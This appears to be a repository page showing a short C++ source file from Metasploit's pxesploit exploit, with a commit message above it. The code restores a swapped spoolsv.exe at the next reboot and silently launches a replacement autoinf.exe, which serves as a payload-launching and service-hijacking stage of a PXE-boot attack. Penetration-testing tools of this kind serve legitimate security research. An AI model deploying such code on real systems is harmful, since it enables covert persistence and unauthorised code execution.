scriptjunkie
1e811aed02
Also removes duplicated code between external/source/exploits/pxesploit and external/source/pxesploit. [Closes #63] Squashed commit of the following: commit 325f52527233ded1bf6506c366ec8cb9efdc2610 Author: scriptjunkie <scriptjunkie@scriptjunkie.us> Date: Fri Dec 16 12:14:18 2011 -0600 Jetzt auf Deutsch! y español! 中國人! [update pxexploit to resolve administrators' group name rather than assume the English 'Administrators'] Also remove duplicate/old pxexploit source code from the tree.
22 lines
773 B
C++
22 lines
773 B
C++
#include <Windows.h>
|
|
void start(){
|
|
//Set up move back just in case
|
|
MoveFileExA("C:\\Windows\\System32\\spoolsv.bak.exe","C:\\Windows\\System32\\spoolsv.exe",
|
|
MOVEFILE_REPLACE_EXISTING|MOVEFILE_DELAY_UNTIL_REBOOT);
|
|
|
|
//start replacement proc
|
|
char windowsPath[MAX_PATH];
|
|
GetWindowsDirectoryA(windowsPath,MAX_PATH);
|
|
SetCurrentDirectoryA(windowsPath);
|
|
STARTUPINFOA strt;
|
|
PROCESS_INFORMATION proci;
|
|
for(int i = 0; i < sizeof(strt); i++)
|
|
((char*)&strt)[i]=0;
|
|
for(int i = 0; i < sizeof(proci); i++)
|
|
((char*)&proci)[i]=0;
|
|
//one of these will work
|
|
if(CreateProcessA("System32\\autoinf.exe",NULL,NULL,NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci) == 0)
|
|
CreateProcessA("SysWOW64\\autoinf.exe",NULL,NULL,NULL,FALSE,CREATE_NO_WINDOW,NULL,NULL,&strt,&proci);
|
|
}
|
|
|